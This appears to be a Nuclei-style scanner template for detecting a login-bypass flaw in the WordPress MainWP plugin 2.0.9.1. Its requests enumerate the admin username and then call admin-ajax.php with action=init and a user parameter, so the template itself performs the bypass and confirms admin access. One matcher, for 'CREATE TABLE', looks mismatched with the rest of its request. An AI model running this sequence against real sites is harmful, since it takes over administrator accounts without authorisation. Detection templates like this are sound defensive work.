id: Wordpress-MainWP_Plugins-BypassLogin
info:
  name: WordPress MainWP V2.0.9.1 login bypass vulnerability detection
  author:
  - l0ne1y
  description: |-
    WordPress Plugin MainWP V2.0.9.1 code logic problem leads to login bypass vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    WordPress MainWP V2.0.9.1 code security issue. In the function called by "init", the check of user authentication is not perfect. Anyone can trigger the login mechanism of the plug-in user, so the intruder can use this to take over any administrator account.
  reference:
  - http://www.beebeeto.com/pdb/poc-2015-0080
  severity: critical
  remediation: "Official fix:\n1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://security-advisory-mainwp-child-wordpress-plugin"
requests:
- matchers:
  - type: status
    status:
    - 200
  - type: word
    words:
    - CREATE TABLE
  extractors:
  - name: username
    type: regex
    regex:
    - 'class="archive author author-(.*?) author-1 '
    group: 1
    part: body
    internal: true
  matchers-condition: and
  path:
  - '{{BaseURL}}/?author=1'
  method: GET
- path:
  - '{{BaseURL}}/wp-admin/admin-ajax.php?action=init&login_required=1&user={{username}}'
  method: GET
- matchers:
  - type: status
    status:
    - 200
  - type: word
    words:
    - <div id='wpadminbar' class='nojq nojs' role='navigation'>
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-admin/'
  method: GET
